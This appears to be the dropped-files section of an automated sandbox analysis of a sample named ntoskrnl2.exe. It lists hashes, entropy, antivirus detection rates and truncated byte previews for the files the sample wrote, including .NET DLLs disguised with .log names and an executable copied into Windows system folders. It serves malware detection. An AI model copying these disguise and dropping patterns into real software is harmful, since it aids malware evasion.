                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p15fimwv.ve2.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4fepgse.gz5.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psaxbpy4.omj.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbuv1kq5.a5z.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qqe240yi.or4.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2attkye.l4c.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0atzti3.rch.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tuixmhfl.4oi.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwucal2w.wly.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaltv13k.yip.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\foSHXkVyDm

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):25
                                                                            Entropy (8bit):4.323856189774724
                                                                            Encrypted:false
                                                                            SSDEEP:3:EXnSDdicV:JB/V
                                                                            MD5:255122D639996D1213C1661CC33AE012
                                                                            SHA1:EE13C53C5CA88F04E7E58079883BAB7F18E462C1
                                                                            SHA-256:D7A615E2944D6B1B713BA0AB3B07A2715F2DCBD5F481FADF4D6EBF84448AB534
                                                                            SHA-512:86AF299CCB237C60293253F091732063CD1744B3FC294AA15EDD614AC18478AA38B1B5A66D3399040CB61FD13DF00060973EA8F32B9DEFF497105B56A6D1738D
                                                                            Malicious:false
                                                                            Preview:4pZUv8BjtR2ZJ7lh8GyhRVQ90

                                                                            C:\Users\user\Desktop\33a22f3fbfeb15

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:ASCII text, with very long lines (807), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):807
                                                                            Entropy (8bit):5.880944786613504
                                                                            Encrypted:false
                                                                            SSDEEP:12:2Qz+LPpeh3wtV3F99vy1m3i4EXyCDB2g0seV7B9RU8BYFxzxYfgdCk06mNr7SFP6:9+dc3e5F3q1my4JSh0b/9h2wBNNGFg1
                                                                            MD5:32294933B49F3A89C6C9865B27D68610
                                                                            SHA1:F704F0F6DEB1F2EC36F912C19456198F588778AE
                                                                            SHA-256:902A8FC9F0EC10BF68989E6735B0FDB500A40814B9B23D2501D2D1DEC79A151F
                                                                            SHA-512:661A35949B7A8B902231BB1325320689F159D75489765369BE86A1F164176963F488EDDA6B024283C21A0F4503DEF16486579250AD743BE5E8705B895A36742D
                                                                            Malicious:false
                                                                            Preview:iJGHDaIMqAPqSd0MSw0GDaM8ey6Trnuh2xuSuCPwp4RhEcQXaviM4NuI6InPezfCQryftibQhDaJIp3Bhi35FhmoDmVmYAS0ZPQWnvo1TSp1wl9ROlr55k6sFKbHNz1gukt3YhXw4Blx2v1cmEYxSX4zShRdTgoebIGM1G2qN4B48IzTT9eIbDOXq4k0Q4dXXHWuoolgMrjYVA0Ks7KUCfCX3tg6gBaTang1wEpoY86udzBqDaITtJV2E905IoAKRQ7sd9YnRg5DiS3Erz3F2HjRSowwOufu8wdN2TMDCfBNNSTvFwNTu4SJqpazMlZhBLEwzqLYnzDWFWDAUBrbgM9EeTgM3W1aGeMBNh5Zlzp505EUmafL47AzMASgJ8fQ8nPlKBwwGRzrgDOiOLkc1qgJeWzMPYPmUZ6NpdKkntEmITSIvtS8YCZSGGGxMjgrCNWHHB2vBAzHl4BKEqafGROS9oGjWWXDMWk46LBu1g6YMRrMF5tfIAlu8EHc4TZomv5OTGO2pqojU0Fs73dan14Lvz62DizhHRvaWc29r00cWBaI8ZfBz8Bu1tdeJVzG0GbDEoVeBesxBbztZx4oDysJQAjm9XzWBtlPjWDTDAAVPNtZ4tFWbLDCYSwDFtfnoWwR0jJCukkCyW3CRJrPSd40qj1Rj9NTeWq3bbjVkDl0kAOBZtw5CQVLc5lQr2cuWQibp9l0kVoO1DPpV010NSROBfbf0Snrk1eTcwVZI5VqlGTYq551BmgE9TaKiFARs7oAj5NiebrR6kn5MDz5Xwq8UZUIWL1D5D8ocTy

                                                                            C:\Users\user\Desktop\NewzHbtF.log

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):32256
                                                                            Entropy (8bit):5.631194486392901
                                                                            Encrypted:false
                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                            Joe Sandbox View:
                                                                            • Filename: top.exe, Detection: malicious, Browse
                                                                            • Filename: DC86.exe, Detection: malicious, Browse
                                                                            • Filename: WinPerfcommon.exe, Detection: malicious, Browse
                                                                            • Filename: Udzp7lL5ns.exe, Detection: malicious, Browse
                                                                            • Filename: loader.exe, Detection: malicious, Browse
                                                                            • Filename: hz7DzW2Yop.exe, Detection: malicious, Browse
                                                                            • Filename: 7aHY4r6vXR.exe, Detection: malicious, Browse
                                                                            • Filename: 0V2JsCrGUB.exe, Detection: malicious, Browse
                                                                            • Filename: FYKrlfQrxb.exe, Detection: malicious, Browse
                                                                            • Filename: PlZA6b48MW.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                            C:\Users\user\Desktop\NgAzKpfk.log

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):23552
                                                                            Entropy (8bit):5.519109060441589
                                                                            Encrypted:false
                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                            C:\Users\user\Desktop\clfwIsGE.log

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):32256
                                                                            Entropy (8bit):5.631194486392901
                                                                            Encrypted:false
                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                            C:\Users\user\Desktop\dxIWpAcW.log

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):23552
                                                                            Entropy (8bit):5.519109060441589
                                                                            Encrypted:false
                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                            C:\Users\user\Desktop\fscFeKAz.log

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):50176
                                                                            Entropy (8bit):5.723168999026349
                                                                            Encrypted:false
                                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                            C:\Users\user\Desktop\olnMZMXE.log

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):50176
                                                                            Entropy (8bit):5.723168999026349
                                                                            Encrypted:false
                                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                            C:\Windows\Containers\GFIYCbjKVID.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                            Category:dropped
                                                                            Size (bytes):1430164
                                                                            Entropy (8bit):7.968311057541044
                                                                            Encrypted:false
                                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 76%
                                                                            Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                            C:\Windows\Containers\GFIYCbjKVID.exe:Zone.Identifier

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:false
                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                            C:\Windows\Containers\d899e5aa4a0be6

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:ASCII text, with very long lines (397), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):397
                                                                            Entropy (8bit):5.854092928070409
                                                                            Encrypted:false
                                                                            SSDEEP:12:Gz3zySQ/NTRrdJtgRzmrJeGrgT9/hqi3if1HXA9:wzySQlTRpQRGeGrziK13E
                                                                            MD5:E8FF17134B75691E8E6DF10A56208BFD
                                                                            SHA1:D7F3C5635F91F0EC8F9B257FD75AA4939026A592
                                                                            SHA-256:A20EFBEA891B17DD3EDF21DBCB40288FA490D96204DE372FE667A799F880EA36
                                                                            SHA-512:0C8A70B799566B11680BC82EF563CDD778719BCC94767F15BF314E418EC27B7DA67C7BB33EBD88458C123E32D0C13DD925614F8CDBCA2A06CA90FA957BC76DC2
                                                                            Malicious:false
                                                                            Preview:qe8fPE45QppKkEMTjoW2m8c2OENAZGDFR6c1NVx0JCXwnoJnKDAQ2PvrCFQL14gJmk2omVGN1ftjkqOk5k0WGxMCKvzHFm9OgOKDvfAz6wZXfMGV0qPREJDyX0d0f8IPgeDWfLzajAZUYzg8odQYWrKWLVp4BJT7nJ0AIt0p0zsDusaiTfMCst2yUqLJf4YZrbqO8fz4nkhg9Hmc5Hlg7QP3RBqciqK6bSVSBMjxpRZHLVzNEsOXT2baMx66zXW6ZlFrvUasix0q1Hr5McXzbxni04FOQm8S4crkQIbuSgyfBvjEFBuW9gem8g00OMc5zivZaHpEAnh58HhFVBIO2lSY7FmtSlfFE3qc9Jo8WpVV8jn09ueMDNDNPXbUe5wZIb0FaEGMXK2MP

                                                                            C:\Windows\Migration\WTR\GFIYCbjKVID.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                            Category:dropped
                                                                            Size (bytes):1430164
                                                                            Entropy (8bit):7.968311057541044
                                                                            Encrypted:false
                                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 76%
                                                                            Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

